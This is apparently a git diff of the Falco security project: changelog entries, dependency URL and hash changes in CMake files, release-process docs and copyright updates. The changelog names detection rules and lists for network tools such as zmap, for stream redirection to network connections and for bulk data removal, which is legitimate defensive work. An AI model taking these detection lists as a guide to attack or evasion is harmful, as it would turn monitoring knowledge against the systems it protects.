* rule(Create files below dev): do not throw for activities known to create files below dev [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_contact_k8s_api_server_activities): new macro to be overridden to list activities known to contact Kubernetes API server [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Contact K8S API Server From Container): do not throw for activities known to contact Kubernetes API server [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_network_tool_activities): new macro to be overridden to list activities known to spawn/use network tools [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Launch Suspicious Network Tool in Container): do not throw for activities known to spawn/use network tools [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_remove_data_activities): new macro to be overridden to list activities known to perform data remove commands [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Remove Bulk Data from Disk): do not throw for activities known to perform data remove commands [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_create_hidden_file_activities): new macro to be overridden to list activities known to create hidden files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Create Hidden Files or Directories): do not throw for activities known to create hidden files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_stand_streams_redirect_activities): new macro to be overridden to list activities known to redirect stream to network connection (in containers) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Redirect STDOUT/STDIN to Network Connection in Container): do not throw for activities known to redirect stream to network connection (in containers) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_container_drift_activities): new macro to be overridden to list activities known to create executables in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Container Drift Detected (chmod)): do not throw for activities known to give execution permissions to files in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Container Drift Detected (open+create)): do not throw for activities known to create executables in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_node_port_service): do not throw for services known to start with a NopePort service type (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Create NodePort Service): do not throw for services known to start with a NopePort service type (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_exec_pod_activities): do not throw for activities known to attach/exec to a pod (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Attach/Exec Pod): do not throw for activities known to attach/exec to a pod (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro trusted_pod): defines trusted pods by an image list [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Pod Created in Kube Namespace): do not throw for trusted pods [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro trusted_sa): define trusted ServiceAccount [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Service Account Created in Kube Namespace): do not throw for trusted ServiceAccount [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(list network_tool_binaries): add zmap to the list [[#1284](https://github.com/falcosecurity/falco/pull/1284)]
* rule(macro root_dir): correct macro to exactly match the `/root` dir and not other with just `/root` as a prefix [[#1279](https://github.com/falcosecurity/falco/pull/1279)]
* rule(macro user_expected_terminal_shell_in_container_conditions): allow whitelisting terminals in containers under specific conditions [[#1154](https://github.com/falcosecurity/falco/pull/1154)]
* rule(macro user_known_write_below_binary_dir_activities): allow writing to a binary dir in some conditions [[#1260](https://github.com/falcosecurity/falco/pull/1260)]
* rule(macro trusted_logging_images): Add addl fluentd image [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
* rule(macro trusted_logging_images): Let azure-npm image write to /var/log [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
* rule(macro lvprogs_writing_conf): Add lvs as a lvm program [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
* rule(macro user_known_k8s_client_container): Allow hcp-tunnelfront to run kubectl in containers [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
* rule(list allowed_k8s_users): Add vertical pod autoscaler as known k8s users [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
* rule(Anonymous Request Allowed): update to checking auth decision equals to allow [[#1267](https://github.com/falcosecurity/falco/pull/1267)]
* rule(Container Drift Detected (chmod)): new rule to detect if an existing file get exec permissions in a container [[#1254](https://github.com/falcosecurity/falco/pull/1254)]
* rule(Container Drift Detected (open+create)): new rule to detect if a new file with execution permission is created in a container [[#1254](https://github.com/falcosecurity/falco/pull/1254)]
* rule(Mkdir binary dirs): correct condition in macro `bin_dir_mkdir` to catch `mkdirat` syscall [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
* rule(Modify binary dirs): correct condition in macro `bin_dir_rename` to catch `rename`, `renameat`, and `unlinkat` syscalls [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
* rule(Create files below dev): correct condition to catch `openat` syscall [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
* rule(macro user_known_set_setuid_or_setgid_bit_conditions): create macro [[#1213](https://github.com/falcosecurity/falco/pull/1213)]
## v0.23.0
Released on 2020-05-18
### Major Changes
* BREAKING CHANGE: the falco-driver-loader script now references `falco-probe.o` and `falco-probe.ko` as `falco.o` and `falco.ko` [[#1158](https://github.com/falcosecurity/falco/pull/1158)]
* BREAKING CHANGE: the `falco-driver-loader` script environment variable to use a custom repository to download drivers now uses the `DRIVERS_REPO` environment variable instead of `DRIVER_LOOKUP_URL`. This variable must contain the parent URI containing the following directory structure `/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]`. e.g: [[#1160](https://github.com/falcosecurity/falco/pull/1160)]
* new(scripts): options and command-line usage for `falco-driver-loader` [[#1200](https://github.com/falcosecurity/falco/pull/1200)]
* new: ability to specify exact matches when adding rules to Falco engine (only API) [[#1185](https://github.com/falcosecurity/falco/pull/1185)]
* new(docker): add an image that wraps the `falco-driver-loader` with the toolchain [[#1192](https://github.com/falcosecurity/falco/pull/1192)]
* new(docker): add `falcosecurity/falco-no-driver` image [[#1205](https://github.com/falcosecurity/falco/pull/1205)]
### Minor Changes
* update(scripts): improve `falco-driver-loader` output messages [[#1200](https://github.com/falcosecurity/falco/pull/1200)]
* update: containers look for prebuilt drivers on the Drivers Build Grid [[#1158](https://github.com/falcosecurity/falco/pull/1158)]
* update: driver version bump to 96bd9bc560f67742738eb7255aeb4d03046b8045 [[#1190](https://github.com/falcosecurity/falco/pull/1190)]
* update(docker): now `falcosecurity/falco:slim-*` alias to `falcosecurity/falco-no-driver:*` [[#1205](https://github.com/falcosecurity/falco/pull/1205)]
* docs: instructions to run unit tests [[#1199](https://github.com/falcosecurity/falco/pull/1199)]
* docs(examples): move `/examples` to `contrib` repo [[#1191](https://github.com/falcosecurity/falco/pull/1191)]
* update(docker): remove `minimal` image [[#1196](https://github.com/falcosecurity/falco/pull/1196)]
* update(integration): move `/integrations` to `contrib` repo [[#1157](https://github.com/falcosecurity/falco/pull/1157)]
* https://dl.bintray.com/driver/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]` [[#1160](https://github.com/falcosecurity/falco/pull/1160)]
* update(docker/event-generator): remove the event-generator from Falco repository [[#1156](https://github.com/falcosecurity/falco/pull/1156)]
* docs(examples): set audit level to metadata for object secrets [[#1153](https://github.com/falcosecurity/falco/pull/1153)]
### Bug Fixes
* fix(scripts): upstream files (prebuilt drivers) for the generic Ubuntu kernel contains "ubuntu-generic" [[#1212](https://github.com/falcosecurity/falco/pull/1212)]
* fix: support Falco driver on Linux kernels 5.6.y [[#1174](https://github.com/falcosecurity/falco/pull/1174)]
### Rule Changes
* rule(Redirect STDOUT/STDIN to Network Connection in Container): correct rule name as per rules naming convention [[#1164](https://github.com/falcosecurity/falco/pull/1164)]
* rule(Redirect STDOUT/STDIN to Network Connection in Container): new rule to detect Redirect stdout/stdin to network connection in container [[#1152](https://github.com/falcosecurity/falco/pull/1152)]
* rule(K8s Secret Created): new rule to track the creation of Kubernetes secrets (excluding kube-system and service account secrets) [[#1151](https://github.com/falcosecurity/falco/pull/1151)]
* rule(K8s Secret Deleted): new rule to track the deletion of Kubernetes secrets (excluding kube-system and service account secrets) [[#1151](https://github.com/falcosecurity/falco/pull/1151)]
## v0.22.1
Released on 2020-17-04
Released on 2020-04-17
### Major Changes
@@ -24,7 +171,7 @@ Released on 2020-17-04
## v0.22.0
Released on 2020-16-04
Released on 2020-04-16
### Major Changes

View File

@@ -93,7 +93,7 @@ message(STATUS "Using bundled nlohmann-json in '${NJSON_SRC}'")
set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
ExternalProject_Add(
njson
URL "https://s3.amazonaws.com/download.draios.com/dependencies/njson-3.3.0.tar.gz"
URL "https://github.com/nlohmann/json/archive/v3.3.0.tar.gz"
URL_HASH "SHA256=2fd1d207b4669a7843296c41d3b6ac5b23d00dec48dba507ba051d14564aa801"
CONFIGURE_COMMAND ""
BUILD_COMMAND ""
@@ -106,14 +106,15 @@ find_package(Curses REQUIRED)
message(STATUS "Found ncurses: include: ${CURSES_INCLUDE_DIR}, lib: ${CURSES_LIBRARIES}")
# libb64
set(B64_SRC "${PROJECT_BINARY_DIR}/b64-prefix/src/b64")
message(STATUS "Using bundled b64 in '${B64_SRC}'")
set(B64_INCLUDE "${B64_SRC}/include")
set(B64_LIB "${B64_SRC}/src/libb64.a")
ExternalProject_Add(
b64
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL_HASH "SHA256=343d8d61c5cbe3d3407394f16a5390c06f8ff907bd8d614c16546310b689bfd3"
URL "https://github.com/libb64/libb64/archive/v1.2.1.zip"
URL_HASH "SHA256=665134c2b600098a7ebd3d00b6a866cb34909a6d48e0e37a0eda226a4ad2638a"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -135,8 +136,8 @@ set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
ExternalProject_Add(
luajit
URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL_HASH "SHA256=55be6cb2d101ed38acca32c5b1f99ae345904b365b642203194c585d27bebd79"
URL "https://github.com/LuaJIT/LuaJIT/archive/v2.0.3.tar.gz"
URL_HASH "SHA256=8da3d984495a11ba1bce9a833ba60e18b532ca0641e7d90d97fafe85ff014baa"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -151,20 +152,15 @@ list(APPEND LPEG_DEPENDENCIES "luajit")
ExternalProject_Add(
lpeg
DEPENDS ${LPEG_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL_HASH "SHA256=10190ae758a22a16415429a9eb70344cf29cbda738a6962a9f94a732340abf8e"
URL "http://www.inf.puc-rio.br/~roberto/lpeg/lpeg-1.0.2.tar.gz"
URL_HASH "SHA256=48d66576051b6c78388faad09b70493093264588fcd0f258ddaab1cdd4a15ffe"
BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
BUILD_IN_SOURCE 1
CONFIGURE_COMMAND ""
INSTALL_COMMAND "")
# libyaml
find_library(LIBYAML_LIB NAMES libyaml.so)
if(LIBYAML_LIB)
message(STATUS "Found libyaml: lib: ${LIBYAML_LIB}")
else()
message(FATAL_ERROR "Couldn't find system libyaml")
endif()
include(libyaml)
# lyaml
set(LYAML_SRC "${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/ext/yaml")
@@ -175,7 +171,7 @@ list(APPEND LYAML_DEPENDENCIES "luajit")
ExternalProject_Add(
lyaml
DEPENDS ${LYAML_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL "https://github.com/gvvaughan/lyaml/archive/release-v6.0.tar.gz"
URL_HASH "SHA256=9d7cf74d776999ff6f758c569d5202ff5da1f303c6f4229d3b41f71cd3a3e7a7"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -215,6 +211,9 @@ ExternalProject_Add(
BUILD_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" WITH_CPP=1
INSTALL_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" install-lib install-headers PREFIX=${CIVETWEB_SRC}/install "WITH_CPP=1")
#string-view-lite
include(DownloadStringViewLite)
# gRPC
include(gRPC)

View File

@@ -11,6 +11,7 @@
- [Rule type](#rule-type)
- [Coding Guidelines](#coding-guidelines)
- [C++](#c)
- [Unit testing](/tests/README.md)
- [Developer Certificate Of Origin](#developer-certificate-of-origin)
## Code of Conduct
@@ -80,7 +81,7 @@ Some examples:
### Slack
Other discussion, and **support requests** should go through the `#falco` channel in the open source slack, please join [here](https://slack.sysdig.com).
Other discussion, and **support requests** should go through the `#falco` channel in the Kubernetes slack, please join [here](https://slack.k8s.io/).
## Pull Requests

2
OWNERS
View File

@@ -3,6 +3,7 @@ approvers:
- kris-nova
- leodido
- mstemm
- leogr
reviewers:
- fntlnz
- kaizhe
@@ -10,3 +11,4 @@ reviewers:
- leodido
- mfdii
- mstemm
- leogr

View File

@@ -2,7 +2,7 @@
Our release process is mostly automated, but we still need some manual steps to initiate and complete it.
Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released.
Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released.
Releases happen on a monthly cadence, towards the 16th of the on-going month, and we need to assign owners for each (usually we pair a new person with an experienced one). Assignees and the due date are proposed during the [weekly community call](https://github.com/falcosecurity/community). Note that hotfix releases can happen as soon as it is needed.
@@ -12,25 +12,26 @@ Finally, on the proposed due date the assignees for the upcoming release proceed
### 1. Release notes
- Let `YYYY-MM-DD` the day before of the [latest release](https://github.com/falcosecurity/falco/releases)
- Check the release note block of every PR matching the `is:pr is:merged closed:>YYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
- Check the release note block of every PR matching the `is:pr is:merged closed:>YYYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
- Ensure the release note block follows the [commit convention](https://github.com/falcosecurity/falco/blob/master/CONTRIBUTING.md#commit-convention), otherwise fix its content
- If the PR has no milestone, assign it to the milestone currently undergoing release
- Check issues without a milestone (using [is:pr is:merged no:milestone closed:>YYYT-MM-DD](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD) filter) and add them to the milestone currently undergoing release
- Double-check that there are no more merged PRs without the target milestone assigned with the `is:pr is:merged no:milestone closed:>YYYT-MM-DD` [filters](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD), if any, fix them
### 2. Milestones
- Move the [tasks not completed](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Aopen) to a new minor milestone
- Close the completed milestone
### 3. Release PR
- Double-check if any hard-coded version number is present in the code, it should be not present anywhere:
- If any, manually correct it then open an issue to automate version number bumping later
- Versions table in the `README.md` update itself automatically
- Generate the change log https://github.com/leodido/rn2md, or https://fs.fntlnz.wtf/falco/milestones-changelog.txt for the lazy people (it updates every 5 minutes)
- Generate the change log https://github.com/leodido/rn2md, or https://fs.fntlnz.wtf/falco/milestones-changelog.txt for the lazy people (it updates every 5 minutes)
- Add the lastest changes on top the previous `CHANGELOG.md`
- Submit a PR with the above modifications
- Await PR approval
- Close the completed milestone as soon PR is merged
## Release
@@ -52,6 +53,7 @@ Let `x.y.z` the new version.
- Wait for the CI to complete
### 2. Update the GitHub release
- [Draft a new release](https://github.com/falcosecurity/falco/releases/new)
- Use `x.y.z` both as tag version and release title
- Use the following template to fill the release description:

View File

Before

Width:  |  Height:  |  Size: 4.2 KiB

After

Width:  |  Height:  |  Size: 4.2 KiB

View File

@@ -1,3 +1,16 @@
#
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
set(CPACK_PACKAGE_VENDOR "Cloud Native Computing Foundation (CNCF) cncf.io.")
set(CPACK_PACKAGE_CONTACT "cncf-falco-dev@lists.cncf.io") # todo: change this once we've got @falco.org addresses
@@ -17,14 +30,14 @@ set(CPACK_GENERATOR DEB RPM TGZ)
set(CPACK_DEBIAN_PACKAGE_SECTION "utils")
set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0), libyaml-0-2")
set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0)")
set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
"${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${CMAKE_BINARY_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
)
set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, libyaml, ncurses")
set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, ncurses")
set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postinstall")
set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/preuninstall")
set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postuninstall")

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -0,0 +1,29 @@
#
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
include(ExternalProject)
set(STRING_VIEW_LITE_PREFIX ${CMAKE_BINARY_DIR}/string-view-lite-prefix)
set(STRING_VIEW_LITE_INCLUDE ${STRING_VIEW_LITE_PREFIX}/include)
message(STATUS "Found string-view-lite: include: ${STRING_VIEW_LITE_INCLUDE}")
ExternalProject_Add(
string-view-lite
PREFIX ${STRING_VIEW_LITE_PREFIX}
GIT_REPOSITORY "https://github.com/martinmoene/string-view-lite.git"
GIT_TAG "v1.4.0"
CONFIGURE_COMMAND ""
BUILD_COMMAND ""
INSTALL_COMMAND
${CMAKE_COMMAND} -E copy ${STRING_VIEW_LITE_PREFIX}/src/string-view-lite/include/nonstd/string_view.hpp
${STRING_VIEW_LITE_INCLUDE}/nonstd/string_view.hpp)

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -1,3 +1,16 @@
#
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# Retrieve git ref and commit hash
include(GetGitRevisionDescription)

View File

@@ -1,3 +1,15 @@
#
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
if(NOT USE_BUNDLED_DEPS)
find_package(OpenSSL REQUIRED)
message(STATUS "Found openssl: include: ${OPENSSL_INCLUDE_DIR}, lib: ${OPENSSL_LIBRARIES}")
@@ -20,8 +32,8 @@ else()
ExternalProject_Add(
openssl
# START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
URL_HASH "SHA256=370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe"
URL "https://github.com/openssl/openssl/archive/OpenSSL_1_0_2n.tar.gz"
URL_HASH "SHA256=4f4bc907caff1fee6ff8593729e5729891adcee412049153a3bb4db7625e8364"
# END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
BUILD_COMMAND ${CMD_MAKE}

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
@@ -31,7 +31,7 @@ else()
curl
DEPENDS openssl
# START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
URL "https://github.com/curl/curl/releases/download/curl-7_61_0/curl-7.61.0.tar.bz2"
URL_HASH "SHA256=5f6f336921cf5b84de56afbd08dfb70adeef2303751ffb3e570c936c6d656c9c"
# END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
CONFIGURE_COMMAND

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -0,0 +1,32 @@
#
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
if(NOT USE_BUNDLED_DEPS)
find_library(LIBYAML_LIB NAMES libyaml.so)
if(LIBYAML_LIB)
message(STATUS "Found libyaml: lib: ${LIBYAML_LIB}")
else()
message(FATAL_ERROR "Couldn't find system libyaml")
endif()
else()
set(LIBYAML_SRC "${PROJECT_BINARY_DIR}/libyaml-prefix/src/libyaml")
message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
set(LIBYAML_LIB "${LIBYAML_SRC}/src/.libs/libyaml.a")
ExternalProject_Add(
libyaml
URL "https://github.com/yaml/libyaml/releases/download/0.2.5/yaml-0.2.5.tar.gz"
URL_HASH "SHA256=c642ae9b75fee120b2d96c712538bd2cf283228d2337df2cf2988e3c02678ef4"
CONFIGURE_COMMAND ./configure --enable-static=true --enable-shared=false
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
INSTALL_COMMAND "")
endif()

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
@@ -16,7 +16,7 @@ set(SYSDIG_CMAKE_WORKING_DIR "${CMAKE_BINARY_DIR}/sysdig-repo")
# this needs to be here at the top
if(USE_BUNDLED_DEPS)
# explicitly force this dependency to use the system OpenSSL
# explicitly force this dependency to use the bundled OpenSSL
set(USE_BUNDLED_OPENSSL ON)
endif()
@@ -26,8 +26,8 @@ file(MAKE_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
# To update sysdig version for the next release, change the default below
# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
if(NOT SYSDIG_VERSION)
set(SYSDIG_VERSION "47374b2b73734d509f3c99890c80be5242021c3d")
set(SYSDIG_CHECKSUM "SHA256=df73b5c69eca8880e30c618dc47b995140286b47fa845c97a3d7a6ddb2d6f1b1")
set(SYSDIG_VERSION "85c88952b018fdbce2464222c3303229f5bfcfad")
set(SYSDIG_CHECKSUM "SHA256=6c3f5f2d699c9540e281f50cbc5cb6b580f0fc689798bc65d4a77f57f932a71c")
endif()
set(PROBE_VERSION "${SYSDIG_VERSION}")

View File

@@ -1,5 +1,5 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at

View File

@@ -1,2 +1,6 @@
labels:
- area/integration
- area/integration
approvers:
- leogr
reviewers:
- leogr

View File

@@ -1,14 +1,14 @@
# Falco Dockerfiles
This directory contains various ways to package Falco as a container.
This directory contains various ways to package Falco as a container and related tools.
## Currently Supported Images
| Name | Directory | Description |
|---|---|---|
| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/stable | Falco (DEB built from git tag or from the master) with all the building toolchain. |
| [falcosecurity/falco:latest-slim](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-slim](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/slim | Falco (DEB build from git tag or from the master) without the building toolchain. |
| [falcosecurity/falco:latest-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/minimal | Falco (TGZ built from git tag or from the master) without the building toolchain. |
| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/falco | Falco (DEB built from git tag or from the master) with all the building toolchain. |
| [falcosecurity/falco-driver-loader:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:master](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader) | docker/driver-loader | `falco-driver-loader` as entrypoint with the building toolchain. |
| [falcosecurity/falco-no-driver:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver), [falcosecurity/falco-no-driver:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver),[falcosecurity/falco-no-driver:master](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver) | docker/no-driver | Falco (TGZ built from git tag or from the master) without the building toolchain. |
| [falcosecurity/falco-builder:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-builder) | docker/builder | The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source. Used to build Falco (CI). |
| [falcosecurity/falco-tester:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-tester) | docker/tester | Container image for running the Falco test suite. Used to run Falco integration tests (CI). |
| _to not be published_ | docker/local | Built on-the-fly and used by falco-tester. |

View File

@@ -0,0 +1,13 @@
ARG FALCO_IMAGE_TAG=latest
FROM falcosecurity/falco:${FALCO_IMAGE_TAG}
LABEL maintainer="cncf-falco-dev@lists.cncf.io"
